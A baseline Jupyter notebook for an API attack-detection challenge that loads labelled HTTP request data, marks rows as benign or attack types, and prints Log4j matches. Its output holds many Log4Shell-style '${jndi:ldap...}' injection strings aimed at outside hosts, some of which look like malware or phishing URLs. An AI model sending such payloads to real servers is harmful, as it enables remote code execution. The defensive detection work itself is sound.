# Cisco - Ariel University API Security Detection Challenge 2023
## Baseline code


### Imports and global settings

In [1]:
# Imports, settings and first dataset view
import pandas as pd
import seaborn as sns
import numpy as np
import json
import matplotlib.pyplot as plt

from sklearn.feature_extraction.text import CountVectorizer, HashingVectorizer, TfidfVectorizer
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier, IsolationForest
from sklearn.metrics import confusion_matrix, classification_report
from collections import Counter
from sklearn.svm import LinearSVC, SVC
from sklearn.linear_model import LogisticRegression
from sklearn.neighbors import KNeighborsClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.preprocessing import StandardScaler 
import re


LOG_4_ATTACK = "LOGJATTACKHERE"

# Set pandas to show all columns when you print a dataframe
pd.set_option('display.max_columns', None)

# Global setting here you choose the dataset number and classification type for the model
dataset_number = 4 # Options are [1, 2, 3, 4]
test_type = 'attack_type' # Options are ['label', 'attack_type']


# Read the json and read it to a pandas dataframe object, you can change these settings
with open(f'./dataset_{str(dataset_number)}_train.json') as file:
    raw_ds = json.load(file)
    file.close()
df = pd.json_normalize(raw_ds, max_level=2)
# Shoe the first five lines of the dataframe to see if everything was read accordingly 
df.head()

Unnamed: 0,request.headers.Host,request.headers.User-Agent,request.headers.Accept-Encoding,request.headers.Accept,request.headers.Connection,request.headers.Sec-Ch-Ua-Platform,request.headers.Sec-Ch-Ua-Mobile,request.headers.Accept-Language,request.headers.Sec-Fetch-Site,request.headers.Sec-Fetch-Mode,request.headers.Cache-Control,request.headers.Sec-Fetch-User,request.headers.Sec-Fetch-Dest,request.headers.Set-Cookie,request.headers.Date,request.method,request.url,request.body,response.status,response.headers.Content-Type,response.headers.Content-Length,response.status_code,response.body,request.Attack_Tag,response.headers.Location,request.headers.Cookie,request.headers.Content-Length,response.headers.Set-Cookie,request.headers.Upgrade-Insecure-Requests
0,127.0.0.1:5000,Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1...,"gzip, deflate, br",*/*,keep-alive,"""Windows""",?0,de-CH,none,same-origin,no-store,?1,document,['ttauth=AnmLHb1kdzYvpficmoZ6ahuxln7RK43GPlS6Q...,"Sun, 18 Dec 2022 01:42:25 GMT",GET,http://127.0.0.1:5000/orders/get/random/2,,200 OK,application/json,8,200,"[{}, {}]",,,,,,
1,127.0.0.1:5000,Mozilla/5.0 (Windows NT 6.3; Win64; x64) Apple...,"gzip, deflate, br",*/*,keep-alive,"""Windows""",?0,"en-US,en;q=0.9,he;q=0.8",none,websocket,no-cache,?1,document,['cid=9ML55TwNFFw14MA2N-N6B8v_LTjMEyppvz3F-H99...,"Sun, 18 Dec 2022 01:44:11 GMT",GET,http://127.0.0.1:5000/orders/check/exists?val=...,,404 NOT FOUND,application/json,31,404,"{""error"": ""Order ID not found""}",,,,,,
2,127.0.0.1:5000,Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20...,"gzip, deflate, br${jndi:ldaphabbologinbr.rel7....",*/*,keep-alive,,?1,"en-US,en;q=0.9,he;q=0.8",none,same-origin,no-store,?1,document,['ttauth=XSgpzlTZBc47Xm36ObpZplFzV2KbUgC68xBcA...,"Sun, 18 Dec 2022 01:34:30 GMT",GET,http://127.0.0.1:5000/login/user?username=Rich...,,401 UNAUTHORIZED,application/json,26,401,"{""error"": ""Access denied""}",LOG4J,,,,,
3,127.0.0.1:5000,Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; ...,"x-gzip, x-deflate, gzip, deflate",*/*,keep-alive,"""Windows""",?1,"en-US,en;q=0.9,he;q=0.8",none,websocket,no-cache,?1,document,['ttauth=kOqLuuI_RaiyuKw-926q36BZ4s3ZH251NQ37i...,"Sun, 18 Dec 2022 01:43:59 GMT",GET,http://127.0.0.1:5000/greet/Warren,,200 OK,text/html; charset=utf-8,22,200,text/html; charset=utf-8,,,,,,
4,127.0.0.1:5000,Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) G...,"gzip, deflate, br",*/*,keep-alive,"""Windows""",?1,de-CH,none,websocket,max-age=0,?1,document,['ttauth=rN-ka7ksV-2K6QtY-_wNmdI1i4zY2kVoDQW6e...,"Sun, 18 Dec 2022 01:23:50 GMT",GET,http://127.0.0.1:5000/states/Bagdon?resource=R...,,404 NOT FOUND,application/json,28,404,"{""error"": ""State not found""}",,,,,,


### Basic dataset label arrangements

In [2]:
# Fill the black attack tag lines with "Benign" string
df['request.Attack_Tag'] = df['request.Attack_Tag'].fillna('Benign')
df['attack_type'] = df['request.Attack_Tag']

# This function will be used in the lambda below to iterate over the label columns 
# You can use this snippet to run your own lambda on any data with the apply() method
def categorize(row):  
    if row['request.Attack_Tag'] == 'Benign':
        return 'Benign'
    return 'Malware'

df['label'] = df.apply(lambda row: categorize(row), axis=1)

#df[df['attack_type'] == 'RCE'][['request.url']] = df[df['attack_type'] == 'RCE'][['request.url']].apply(lambda x: x.replace('http://127.0.0.1:5000/', ''))
# df[df['attack_type'] == 'SQL Injection'][['request.url']] = 
#     df[df['attack_type'] == 'SQL Injection'][['request.url']].apply()

# After finishing the arrangements we delete the irrelevant column
df.drop('request.Attack_Tag', axis=1, inplace=True)

df.head()

Unnamed: 0,request.headers.Host,request.headers.User-Agent,request.headers.Accept-Encoding,request.headers.Accept,request.headers.Connection,request.headers.Sec-Ch-Ua-Platform,request.headers.Sec-Ch-Ua-Mobile,request.headers.Accept-Language,request.headers.Sec-Fetch-Site,request.headers.Sec-Fetch-Mode,request.headers.Cache-Control,request.headers.Sec-Fetch-User,request.headers.Sec-Fetch-Dest,request.headers.Set-Cookie,request.headers.Date,request.method,request.url,request.body,response.status,response.headers.Content-Type,response.headers.Content-Length,response.status_code,response.body,response.headers.Location,request.headers.Cookie,request.headers.Content-Length,response.headers.Set-Cookie,request.headers.Upgrade-Insecure-Requests,attack_type,label
0,127.0.0.1:5000,Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1...,"gzip, deflate, br",*/*,keep-alive,"""Windows""",?0,de-CH,none,same-origin,no-store,?1,document,['ttauth=AnmLHb1kdzYvpficmoZ6ahuxln7RK43GPlS6Q...,"Sun, 18 Dec 2022 01:42:25 GMT",GET,http://127.0.0.1:5000/orders/get/random/2,,200 OK,application/json,8,200,"[{}, {}]",,,,,,Benign,Benign
1,127.0.0.1:5000,Mozilla/5.0 (Windows NT 6.3; Win64; x64) Apple...,"gzip, deflate, br",*/*,keep-alive,"""Windows""",?0,"en-US,en;q=0.9,he;q=0.8",none,websocket,no-cache,?1,document,['cid=9ML55TwNFFw14MA2N-N6B8v_LTjMEyppvz3F-H99...,"Sun, 18 Dec 2022 01:44:11 GMT",GET,http://127.0.0.1:5000/orders/check/exists?val=...,,404 NOT FOUND,application/json,31,404,"{""error"": ""Order ID not found""}",,,,,,Benign,Benign
2,127.0.0.1:5000,Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20...,"gzip, deflate, br${jndi:ldaphabbologinbr.rel7....",*/*,keep-alive,,?1,"en-US,en;q=0.9,he;q=0.8",none,same-origin,no-store,?1,document,['ttauth=XSgpzlTZBc47Xm36ObpZplFzV2KbUgC68xBcA...,"Sun, 18 Dec 2022 01:34:30 GMT",GET,http://127.0.0.1:5000/login/user?username=Rich...,,401 UNAUTHORIZED,application/json,26,401,"{""error"": ""Access denied""}",,,,,,LOG4J,Malware
3,127.0.0.1:5000,Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; ...,"x-gzip, x-deflate, gzip, deflate",*/*,keep-alive,"""Windows""",?1,"en-US,en;q=0.9,he;q=0.8",none,websocket,no-cache,?1,document,['ttauth=kOqLuuI_RaiyuKw-926q36BZ4s3ZH251NQ37i...,"Sun, 18 Dec 2022 01:43:59 GMT",GET,http://127.0.0.1:5000/greet/Warren,,200 OK,text/html; charset=utf-8,22,200,text/html; charset=utf-8,,,,,,Benign,Benign
4,127.0.0.1:5000,Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) G...,"gzip, deflate, br",*/*,keep-alive,"""Windows""",?1,de-CH,none,websocket,max-age=0,?1,document,['ttauth=rN-ka7ksV-2K6QtY-_wNmdI1i4zY2kVoDQW6e...,"Sun, 18 Dec 2022 01:23:50 GMT",GET,http://127.0.0.1:5000/states/Bagdon?resource=R...,,404 NOT FOUND,application/json,28,404,"{""error"": ""State not found""}",,,,,,Benign,Benign


In [3]:
def fill_na_df(df_na):
    # Remove all NAN columns or replace with desired string
    # This loop iterates over all of the column names which are all NaN
    for column in df_na.columns[df_na.isna().any()].tolist():
        # df.drop(column, axis=1, inplace=True)
        df_na[column] = df_na[column].fillna('None')

    # If you want to detect columns that may have only some NaN values use this:
    #df.loc[:, df.isna().any()]

fill_na_df(df)
df_checker = pd.DataFrame(df)

# df.to_csv(f'data_set_{dataset_number}.csv', index=False)

df


Unnamed: 0,request.headers.Host,request.headers.User-Agent,request.headers.Accept-Encoding,request.headers.Accept,request.headers.Connection,request.headers.Sec-Ch-Ua-Platform,request.headers.Sec-Ch-Ua-Mobile,request.headers.Accept-Language,request.headers.Sec-Fetch-Site,request.headers.Sec-Fetch-Mode,request.headers.Cache-Control,request.headers.Sec-Fetch-User,request.headers.Sec-Fetch-Dest,request.headers.Set-Cookie,request.headers.Date,request.method,request.url,request.body,response.status,response.headers.Content-Type,response.headers.Content-Length,response.status_code,response.body,response.headers.Location,request.headers.Cookie,request.headers.Content-Length,response.headers.Set-Cookie,request.headers.Upgrade-Insecure-Requests,attack_type,label
0,127.0.0.1:5000,Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1...,"gzip, deflate, br",*/*,keep-alive,"""Windows""",?0,de-CH,none,same-origin,no-store,?1,document,['ttauth=AnmLHb1kdzYvpficmoZ6ahuxln7RK43GPlS6Q...,"Sun, 18 Dec 2022 01:42:25 GMT",GET,http://127.0.0.1:5000/orders/get/random/2,,200 OK,application/json,8,200,"[{}, {}]",,,,,,Benign,Benign
1,127.0.0.1:5000,Mozilla/5.0 (Windows NT 6.3; Win64; x64) Apple...,"gzip, deflate, br",*/*,keep-alive,"""Windows""",?0,"en-US,en;q=0.9,he;q=0.8",none,websocket,no-cache,?1,document,['cid=9ML55TwNFFw14MA2N-N6B8v_LTjMEyppvz3F-H99...,"Sun, 18 Dec 2022 01:44:11 GMT",GET,http://127.0.0.1:5000/orders/check/exists?val=...,,404 NOT FOUND,application/json,31,404,"{""error"": ""Order ID not found""}",,,,,,Benign,Benign
2,127.0.0.1:5000,Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20...,"gzip, deflate, br${jndi:ldaphabbologinbr.rel7....",*/*,keep-alive,,?1,"en-US,en;q=0.9,he;q=0.8",none,same-origin,no-store,?1,document,['ttauth=XSgpzlTZBc47Xm36ObpZplFzV2KbUgC68xBcA...,"Sun, 18 Dec 2022 01:34:30 GMT",GET,http://127.0.0.1:5000/login/user?username=Rich...,,401 UNAUTHORIZED,application/json,26,401,"{""error"": ""Access denied""}",,,,,,LOG4J,Malware
3,127.0.0.1:5000,Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; ...,"x-gzip, x-deflate, gzip, deflate",*/*,keep-alive,"""Windows""",?1,"en-US,en;q=0.9,he;q=0.8",none,websocket,no-cache,?1,document,['ttauth=kOqLuuI_RaiyuKw-926q36BZ4s3ZH251NQ37i...,"Sun, 18 Dec 2022 01:43:59 GMT",GET,http://127.0.0.1:5000/greet/Warren,,200 OK,text/html; charset=utf-8,22,200,text/html; charset=utf-8,,,,,,Benign,Benign
4,127.0.0.1:5000,Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) G...,"gzip, deflate, br",*/*,keep-alive,"""Windows""",?1,de-CH,none,websocket,max-age=0,?1,document,['ttauth=rN-ka7ksV-2K6QtY-_wNmdI1i4zY2kVoDQW6e...,"Sun, 18 Dec 2022 01:23:50 GMT",GET,http://127.0.0.1:5000/states/Bagdon?resource=R...,,404 NOT FOUND,application/json,28,404,"{""error"": ""State not found""}",,,,,,Benign,Benign
...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...,...
182762,127.0.0.1:5000,Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1...,"gzip, deflate, br",*/*,keep-alive,,?0,"en-US,en;q=0.5",none,websocket,no-cache,?1,document,['ttauth=NPpRHbzfv7BJ5RGB9-oJNl30Ttdc8RYxbuiSe...,"Sun, 18 Dec 2022 01:25:40 GMT",GET,http://127.0.0.1:5000/login/user?username=Brue...,,401 UNAUTHORIZED,application/json,26,401,"{""error"": ""Access denied""}",,,,,,SQL Injection,Malware
182763,127.0.0.1:5000,Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko...,"gzip, deflate, br",*/*,keep-alive,,?0,de-CH,none,websocket,no-cache,?1,document,['ttauth=Mqfe3PeeakWRmzjsA7MKaNiXmVcbMxMuNQxej...,"Sun, 18 Dec 2022 01:19:48 GMT",GET,http://127.0.0.1:5000/cookielogin,,200 OK,text/html; charset=utf-8,104,200,text/html; charset=utf-8,,username=gASVyAAAAAAAAACMCGJ1aWx0aW5zlIwEZXZhb...,,,,Cookie Injection,Malware
182764,127.0.0.1:5000,Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebK...,"gzip, deflate, br",*/*,keep-alive,,?0,de-CH,none,same-origin,max-age=0,?1,document,['cid=-Sp8A62rcqJXADEypNzwtw-iIf9cdHkqMQvKTMNB...,"Sun, 18 Dec 2022 01:31:12 GMT",GET,http://127.0.0.1:5000/forum,,200 OK,text/html; charset=utf-8,128212,200,text/html; charset=utf-8,,,,,,XSS,Malware
182765,127.0.0.1:5000,Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl...,"x-gzip, x-deflate, gzip, deflate",*/*,keep-alive,"""Windows""",?0,"en-US,en;q=0.5",none,same-origin,no-store,?1,document,['cid=ERxhJ-aIoFvtHePuy6iitkoC1AdXWOmx2r5Drhpl...,"Sun, 18 Dec 2022 01:50:29 GMT",GET,http://127.0.0.1:5000/orders/get/employee_id/35,,404 NOT FOUND,application/json,34,404,"{""error"": ""Employee ID not found""}",,,,,,Benign,Benign


In [4]:
keep_list = ['Benign', 'LOG4J']
f = df[df['attack_type'].isin(keep_list)]
f = df[df['attack_type'] == 'LOG4J']
#print(*f['request.url'].values.tolist(), sep='\n')
set_cols = set()
counter = 0
column_names = f.columns.values.tolist()
for index, row in f.iterrows():
    for col in column_names:
        data = str(row[col])
        if re.search(r'\$\{[a-z]+:.*\}', data):
            print(f'index:\t{index}')
            print(f'col name:\t{col}')
            print(f'data:{data}\n')
            counter += 1
            set_cols.add(col)
print()
print(set_cols)
print('counter:', counter)
f.shape


index:	2
col name:	request.headers.Accept-Encoding
data:gzip, deflate, br${jndi:ldaphabbologinbr.rel7.com/}

index:	10
col name:	request.headers.Set-Cookie
data:['ttauth=vX8s_fulSrKcPI643qpLHSOmRbwqG9fBIn_EjiXNpM0kMa4-J8AJOM2CUBngbQ-8XKgrYuu4d3GZlRjczgUd8Q; Domain=localhost:5000; Expires=Sun, 18 Dec 2022 01:44:42 GMT', 'ck=ELTyzjGnNBrYPiXZ4MyqfhKB6gzJB5fAKoyPpYOeBuY; Domain=www.pmg.csail.mit.edu/papers/popl97/popl97.html; Expires=Fri, 10 Feb 2023 01:38:42 GMT', 'uu=qouWZbTdWts8RpYdcZ2849SvhOKFrEhWg_pjdjtiJ_o; Domain=duye08.com; Expires=Mon, 09 Jan 2023 01:38:42 GMT', 'session=ee658d7b-1df0-4e7c-a759-452a6d62ce9a; Expires=Sun, 18 Dec 2022 01:43:42 GMT']${jndi:ldapsearch.espn.go.com/jimmy-rollins/}

index:	116
col name:	request.headers.Sec-Fetch-Site
data:none${jndi:ldaphttp://www.civelo.no/index.php?option=com_content&view=article&id=20:civelo-5&catid=14&Itemid=6&lang=sv}

index:	226
col name:	request.headers.Sec-Fetch-Dest
data:document${jndi:ldapcyncon.com/}

index:	237
col name:	requ

index:	21804
col name:	request.headers.Accept-Encoding
data:gzip, deflate, br${jndi:ldapamazon.com/Film-making-Introduction-Craft-Director/dp/0571211259}

index:	21849
col name:	request.headers.Set-Cookie
data:['cid=g86m4YsiVZHm0IOm4njZIjpX7dzFqm0a8cW90YqKt1uWzBotGsFUPsTk28f1rQnKQ6asdSaB5xZLlquJt9xicFg16DB9nGAs0yb5tchZPVElAI74YBTwh2DkijaPnViPDJbeWWQ4Gf33UmbKGiJ-AtQbXbnJOAcqnFb8IGsDSgU; Domain=localhost:5000; Expires=Sun, 18 Dec 2022 01:56:09 GMT', 'ck=mrOP3h_bsAyeA93PRr3_oyxmELRHMOB-fc1uD6bUwzE; Domain=people.famouswhy.com/anita_pointer/; Expires=Mon, 16 Jan 2023 01:19:09 GMT', 'uu=P_O79u4zTYbUhBLQiA-wrkARAYXU0HH9JTdhqJkLWt5a4P_zTperyDzelhqkq5ancW7OxXLw3H6agO9m8m6fPA; Domain=http://thewintershops.com/wp-admin/-/account_americafirstCU_login/login.php; Expires=Mon, 23 Jan 2023 01:19:09 GMT', 'session=4b2ce058-765f-44c3-ba8e-6e3401769783; Expires=Sun, 18 Dec 2022 01:56:09 GMT']${jndi:ldapwatchonedayfree.multiply.com/}

index:	21875
col name:	request.headers.Sec-Fetch-Site
data:none${jndi:

index:	31200
col name:	request.headers.Set-Cookie
data:['ck=U8i94WTCN8tVe771fUj6uA; Domain=http://web.de/magazine/unterhaltung/stars/krebs-angst-angelina-jolie-liess-eierstoecke-entfernen-30531050; Expires=Sun, 01 Jan 2023 01:38:48 GMT', 'uu=TeqOXU4muGT82D4ZwYYehg; Domain=facebook.com/pages/Just-For-Laughs-Gags/109222382437184; Expires=Fri, 30 Dec 2022 01:38:48 GMT', 'session=ece83037-f95d-4cd3-a3c3-fefb0e26b19e; Expires=Sun, 18 Dec 2022 02:03:48 GMT']${jndi:ldapchicostategamestudios.com/VideoGameProduction/}

index:	31211
col name:	request.headers.Set-Cookie
data:['cid=mNMMYTnHp5poKtZ0fS_cT5MfOTOUhrohtTQ0Dl7jcN4_li0kmcXKGgspAELVkslUKBNp6OilC4Qj3t9PcLydGvQvjdbsDNN0agsz0wsYluHCZ-09g0r5QsZ6JT2bdBkQJGIzzkVwmPyMUi2RrjwrD-43boXQOsFfU2eniDI0iBk; Domain=localhost:5000; Expires=Sun, 18 Dec 2022 01:46:47 GMT', 'ck=T1LpRXw6qtx10_mePAxnjBEcZbN-K9TA_waMOvVRyuSmXggbJmjho41zUcAmPVbuNjhAjtefMn4d67ZzxPfj0wH_KoPtz092KoagmdBtItjJMJpEcSnRwu1Vq5oXg7iOAoeAN6ZyF4bVzXOXdibwoDpAu9xl7GiUCuBQrfnfYq4; Domain=pit

index:	49622
col name:	request.headers.Set-Cookie
data:['ttauth=7jAUatyQcnKfmcxIQW9E8QxICW6B0TW7D_clk3g4sz8; Domain=localhost:5000; Expires=Sun, 18 Dec 2022 02:16:33 GMT', 'ck=wjNohpXK0hD2skS0GMz5dTfg7lXASw02x-1qe5V9e-o; Domain=http://9779.info/%E5%B9%BC%E5%84%BF%E5%9B%AD%E8%80%81%E5%B8%88%E8%B4%B4%E7%94%BB%E4%BD%9C%E5%93%81/; Expires=Thu, 26 Jan 2023 01:20:33 GMT', 'uu=_gDpFAUYVjTlHieyeiiRDw; Domain=http://mylust.com/videos/6534/tight-bald-pussy-of-my-voluptuous-teeny-girlfriend-is-fantastic/; Expires=Sun, 22 Jan 2023 01:20:33 GMT', 'session=a8f48425-60af-4023-aa1c-db0b234fa0e9; Expires=Sun, 18 Dec 2022 02:15:33 GMT']${jndi:ldapgenforum.genealogy.com/gault/}

index:	49670
col name:	request.headers.Set-Cookie
data:['ttauth=gBzxP1VdndFFrYHm5amE0GVRbrtKGDBfZsORgIeL9XY; Domain=localhost:5000; Expires=Sun, 18 Dec 2022 02:15:27 GMT', 'ck=HMu6szBaMmc-4YjVVXirB62SwDIfDQD9Bm7Fp9NXMSIFu8NYf1HHyolhBy3aOrpMekKq_7OTHTWM1EBBdu88PM4P9pqhMeztuBUw-wDf3E6JKr5C_0TtWDDi5hh_yHMgWZ1Gyh3H8u0UgRxlafkGwwUUt7s

index:	65062
col name:	request.headers.Sec-Fetch-Dest
data:document${jndi:ldapbay-journal.com/bay/1he/writings/sports/baseball-history-1937.html}

index:	65064
col name:	request.headers.Accept-Encoding
data:gzip, deflate, br${jndi:ldaphttps://pastebin.com/raw/0GDV0vg2}

index:	65070
col name:	request.headers.Set-Cookie
data:['ttauth=hSA6BSrSS2fmL-DjFQjEWw; Domain=localhost:5000; Expires=Sun, 18 Dec 2022 02:27:28 GMT', 'ck=eXQ1xjByMxVexdXUUk5xY-7O9JYSU2PMrMD4DtSztZ8; Domain=wn.com/Swimming_at_the_2000_Summer_Olympics; Expires=Thu, 02 Feb 2023 01:18:28 GMT', 'uu=DsutBc-FXDFVNg70EJ7bz_ENhbd85DdMWO7nie_K9W4; Domain=tools.ietf.org/html/rfc3094; Expires=Sat, 28 Jan 2023 01:18:28 GMT', 'session=ce67f730-c9cd-4edc-b85a-970e639fcad7; Expires=Sun, 18 Dec 2022 01:49:28 GMT']${jndi:ldapamphilsoc.org/mole/view?docId=ead/Mss.Ms.Coll.31-ead.xml}

index:	65142
col name:	request.headers.Set-Cookie
data:['cid=I9eQ8jGc01WCqg_H1-hMXXsORGn8c-HxkYFMSCQ_frFgwvOWI8_aEcLenTidIcRpembL9-Tm2gqm_JdLUQD_YQ2k-vwR1r9

index:	81052
col name:	request.headers.Sec-Fetch-Site
data:none${jndi:ldaphttp://www.develi.org.tr/index.php/haberler/son-haberler/54-iftihar-tablomuz.html}

index:	81074
col name:	request.headers.Set-Cookie
data:['cid=ZVvNwUa8oWmrs5YnIE6ZMj7MknDFrhUrzg9IVX8gmAHmq1cnn6KPbDmew8gfizaTdzKPbXW5inUs4FdVByaFJc4JawY_QxZ9BtLiVd0voNj4ITvD2PzXT9m2jbKFASyg0MyhvRZjXcWBx_L_bFmz_7O4JiQll_DSfdgHWm0bEfo; Domain=localhost:5000; Expires=Sun, 18 Dec 2022 01:53:56 GMT', 'ck=5plSQm8SCKws65itKcpkrw; Domain=http://77.43.129.51:55646/Mozi.m; Expires=Sat, 28 Jan 2023 01:30:56 GMT', 'uu=gW7q0lEW-ipWbodU_YxujAeuSo4Bul2g0Byc7CbF_hKUBJJJwOhYVjDsVb3HMHdzT4W78S8X7EioX6rlT76s9w; Domain=http://www.mycitystore.in/wp-includes/70187978dca46b3c15d58b15d045a3f0; Expires=Sun, 22 Jan 2023 01:30:56 GMT', 'session=292ab27d-10a4-46df-8817-5219df43a119; Expires=Sun, 18 Dec 2022 02:29:56 GMT']${jndi:ldapgenforum.genealogy.com/stafford/}

index:	81088
col name:	request.headers.Sec-Fetch-Site
data:none${jndi:ldaphttp://www.nordseem

index:	103924
col name:	request.headers.Set-Cookie
data:['ck=ZhwRyW5RHrSOmZBBlHylLyzNvBa5FeQFnUXo28XHFatoSfSWCB4jJLC0-B3aODvInyu9LJJp0YR7CcFjbswMkw; Domain=www.biotex-eu.com/pdf/phealth07_wearableinterfaces.pdf; Expires=Sun, 25 Dec 2022 01:39:19 GMT', 'uu=GnxsKOa5rxaMjFefIeO__kMbFxVC6AxhtGsPP4tKq-c; Domain=http://www.ambiani.nl/diensten/feesten-brabant/67-zalen-brabant.html; Expires=Fri, 20 Jan 2023 01:39:19 GMT', 'session=2225957b-82bf-4c28-bd27-4cd1831c9262; Expires=Sun, 18 Dec 2022 01:45:19 GMT']${jndi:ldapsaritamcharg.com/baba-khan---book-extracts.php}

index:	103951
col name:	request.headers.Set-Cookie
data:['ck=TfaIdaeYfLACJnr_mskfL7M12PvdZciNtA2FKKCDNrYJS6Jz3VB3p5XtafM9KjO0PMdAOA8fLwUhK0jzDHJzq4t-l-aa4Nwpz02wpsN9gfEqk48lioqi08S_W5GE7H3AMj4cf_7Le4XKq3eXgy26mnMJMOht0DLV-MmfiNC85-Q; Domain=mylovelymodels.com/models/saira-mohan-model_156.htm; Expires=Sat, 04 Feb 2023 01:21:43 GMT', 'uu=Yt-gjQIfFWbN8xHBtZ7dd8d8QzcMXLt4uh58LckBsiY4LC9j9nKrkNcAIt_us-2m36V-TTFelUgBTgqMwyh-9A; Domain=hom

index:	121271
col name:	request.headers.Sec-Fetch-Site
data:none${jndi:ldaphttps://toulousa.com/omg/291EYJSFYHMS.exe}

index:	121282
col name:	request.headers.Set-Cookie
data:['ck=9RA8i_Xn2mpE_HEu529FNw; Domain=articles.latimes.com/keyword/jelani-mccoy/featured/5; Expires=Tue, 17 Jan 2023 01:19:30 GMT', 'uu=CZDpvUTUPMTeBP6XWJ39aE340vzZTziZgVyor2qPG-4; Domain=www.parasoft.com/jsp/products/home.jsp?product=Jtest; Expires=Tue, 07 Feb 2023 01:19:30 GMT', 'session=c846310e-ba9d-4a85-8082-78c47f37d9db; Expires=Sun, 18 Dec 2022 01:44:30 GMT']${jndi:ldapblog.dreamhost.com/2011/10/03/e-commerce-websites-growing-in-popularity/}

index:	121323
col name:	request.headers.Set-Cookie
data:['ck=0pl4IyygOFzquRjRo4jDrQ; Domain=youtube.com/watch?v=z5-0H616lyE; Expires=Mon, 23 Jan 2023 01:32:43 GMT', 'uu=uHpNPKXxczD4zNMC1568vHn3URjQirQZsRTDDeJRllG89BK6ov2ow4MoabpWwKwGpHUp7vkIm8COhfYSdB3TJc7uP9OoXJQ3jfpKvPfLw2xpBjeSN7F4J6Keu_Hij09GSaUWTP7CuCl9nbqXqs4fQavDWrL9_b-YIqUxC4Upuk4; Domain=https://medium.com/this-

index:	141812
col name:	request.headers.Sec-Fetch-Dest
data:document${jndi:ldapdelaneydesign.com/photography.php}

index:	141833
col name:	request.headers.Sec-Fetch-Dest
data:document${jndi:ldaphttps://www.helpdesk-tech.com/signin?t=eyJhbGciOiJIUzI1NiJ9.eyJ0cmFja2luZ190b2tlbiI6IjM1ZWQ3NTJiLWRjNmMtNDI1My1hNjBhLTk3NjMwYjE4M2VlMSIsImNlbGwiOiJodHRwczovL3FnYmZ3b3c2MGYuZXhlY3V0ZS1hcGkudXMtd2VzdC0yLmFtYXpvbmF3cy5jb20vcHJvZC9hcGkvcGhpc2hpbmdjYW1wYWlnbiIsImNhbXBhaWduX3Rva2VuIjoiZmExNmQ4ZjItMGEzYi00MzMyLTkzYmItZGYyM2QzZGEyZTYzIiwic2VsZWN0ZWRfYXR0YWNrX3Rva2VuIjoiYjM3MDIxMDAtYzNlNC00YjNhLTkxOGMtMzhhMDdjOTE2MDc1IiwidGVzdF90b2tlbiI6dHJ1ZSwiZXh0ZXJuYWxfdHJhaW5pbmciOmZhbHNlLCJpYXQiOjE1ODg2Nzg0MDAsImlzcyI6Imh0dHBzOi8vYXBwLnBoaXNodGhyZWF0LmNvbSIsImV4cCI6MTU5NjQ1NDQwMH0.cXUeuuopjgZ6xYHArGr7U3JGKehmKyYRCJwt5mVlgKw}

index:	141875
col name:	request.headers.Set-Cookie
data:['cid=oNwTSWH0yHaHLdzx-syEEcemx_xp_MFgTnHQ5x5G-oGuozUCJw0BipRkOpvYbWSB-gFVhUOwZPH3nhr5E7DY5C80BUNwgoWvmzo4Uv0XNkubwQtH4PTkuc2IjGrVQdd6En

index:	161639
col name:	request.headers.Accept-Encoding
data:gzip, deflate, br${jndi:ldapfranciscodegoya.net/Charles-IV-And-His-Family.html}

index:	161716
col name:	request.headers.Sec-Fetch-Dest
data:document${jndi:ldapcanadianrvpal.com/d/on/}

index:	161739
col name:	request.headers.Set-Cookie
data:['cid=xvgFTwwW0p2FoEKUvO06K_RZ04XyS29IVQyWP0yRDBclg2uNYmNRKt89zYvOrtB36pHuTXnzH_TrcM4EqznjP9yRLuRriMjSVD7Amih8oTit3f7rNZkgqb_ODo5omIpjwMXZXxp46wWEN3hnXESFW_mmBb7ndSy_cxZNJYdXOY4; Domain=localhost:5000; Expires=Sun, 18 Dec 2022 01:28:14 GMT', 'ck=zGUbXTkg9mq9ZAmubymRCTyBA0KPjbZTh9sXikbPtMJkjudRuhyc0wSplE_2jiXlDsRjpZq_ovp--YNBoAr5FA; Domain=oldsacramento.com/ajaxfilemanager/uploaded/Documents/news/?Kevin+James+O%27Leary; Expires=Mon, 23 Jan 2023 01:21:14 GMT', 'uu=kGrKMJHt1nalBvMO2ugicw; Domain=https://www.jeffersonsgroup.com/BOAedited/en; Expires=Mon, 06 Feb 2023 01:21:14 GMT', 'session=5c7bee89-cad4-453c-bc07-62072333e917; Expires=Sun, 18 Dec 2022 02:14:14 GMT']${jndi:ldapjackbenny.org/ww

index:	179299
col name:	request.headers.Set-Cookie
data:['ck=G9415mM3aBnoM9EbJkT4VA; Domain=http://boughtitsoldit.com/ceservice; Expires=Fri, 03 Feb 2023 01:23:35 GMT', 'uu=MMvito_tXeM1dT99UokCvpzcxM5yrUDPBxJUnYwv5N0; Domain=tvguide.com/celebrities/flora-martinez/236152; Expires=Sat, 04 Feb 2023 01:23:35 GMT', 'session=0b255799-2be0-4081-8e9e-52851ec845ac; Expires=Sun, 18 Dec 2022 02:15:35 GMT']${jndi:ldapodmp.org/officer/20822-patrolman-jonathan-schmidt}

index:	179314
col name:	request.headers.Accept-Encoding
data:gzip, deflate, br${jndi:ldaplookupanyone.com/namelistings/todd-rosewarne-mustapha-roshd.html}

index:	179362
col name:	request.headers.Accept-Encoding
data:gzip, deflate, br${jndi:ldaphttp://avxhome.se/software/software_type/office/Extensis.Portfolio.Enterprise.1.6.2.html}

index:	179405
col name:	request.headers.Accept-Encoding
data:gzip, deflate, br${jndi:ldaphttp://www.art-ecology-education.org/en/component/content/article/40-news/149-aee-events.html}

index:	179430
col 

(3756, 30)

In [5]:
